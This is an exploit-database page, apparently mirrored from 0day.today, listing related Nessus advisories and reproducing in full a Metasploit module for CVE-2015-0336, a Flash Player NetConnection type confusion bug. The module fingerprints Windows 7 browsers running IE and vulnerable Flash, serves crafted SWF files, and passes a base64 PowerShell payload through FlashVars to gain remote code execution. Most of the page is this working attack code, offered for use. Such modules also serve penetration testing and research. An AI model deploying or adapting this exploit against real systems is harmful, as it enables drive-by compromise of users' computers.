Adobe Flash Player NetConnection Type Confusion Exploit

🗓️ 08 May 2015 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 197 Views

Adobe Flash Player NetConnection Type Confusion Exploi

Reporter	Title	Published	Views	Family All 67
Tenable Nessus	Flash Player < 17.0 Multiple Vulnerabilities (APSB15-05)	27 Mar 201500:00	–	nessus
Tenable Nessus	Flash Player < 16.0.0.306 (inferred) Multiple Vulnerabilities (APSB15-01 through 05)	27 Mar 201500:00	–	nessus
Tenable Nessus	Adobe AIR < 17.0.0.144 Multiple Vulnerabilities (APSB15-05)	24 Jul 201500:00	–	nessus
Tenable Nessus	Adobe AIR <= 17.0.0.124 Multiple Vulnerabilities (APSB15-05)	12 Jun 201500:00	–	nessus
Tenable Nessus	Flash Player <= 16.0.0.305 Multiple Vulnerabilities (APSB15-05)	13 Mar 201500:00	–	nessus
Tenable Nessus	FreeBSD : Adobe Flash Player -- critical vulnerabilities (8b3ecff5-c9b2-11e4-b71f-00bd5af88c00)	17 Mar 201500:00	–	nessus
Tenable Nessus	GLSA-201503-09 : Adobe Flash Player: Multiple vulnerabilities	24 Mar 201500:00	–	nessus
Tenable Nessus	Adobe AIR for Mac <= 17.0.0.124 Multiple Vulnerabilities (APSB15-05)	12 Jun 201500:00	–	nessus
Tenable Nessus	Flash Player For Mac <= 16.0.0.305 Multiple Vulnerabilities (APSB15-05)	13 Mar 201500:00	–	nessus
Tenable Nessus	openSUSE Security Update : flash-player (openSUSE-2015-225)	17 Mar 201500:00	–	nessus

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player NetConnection Type Confusion',
      'Description'         => %q{
        This module exploits a type confusion vulnerability in the NetConnection class on
        Adobe Flash Player. When using a correct memory layout this vulnerability allows
        to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
        vectors, and finally accomplish remote code execution. This module has been tested
        successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0336'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'],
          ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'],
          ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Mar 12 2015',
      'DefaultTarget'       => 0))
  end
 
  def exploit
    @swf = create_swf
    @trigger = create_trigger
    super
  end
 
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")
 
    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end
 
    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end
 
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)
 
    trigger_hex_stream = @trigger.unpack('H*')[0]
 
    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/>
    </object>
    </body>
    </html>
    |
 
    return html_template, binding()
  end
 
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
    swf
  end
 
  def create_trigger
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
    swf
  end
end

#  0day.today [2018-01-05]  #

08 May 2015 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.88658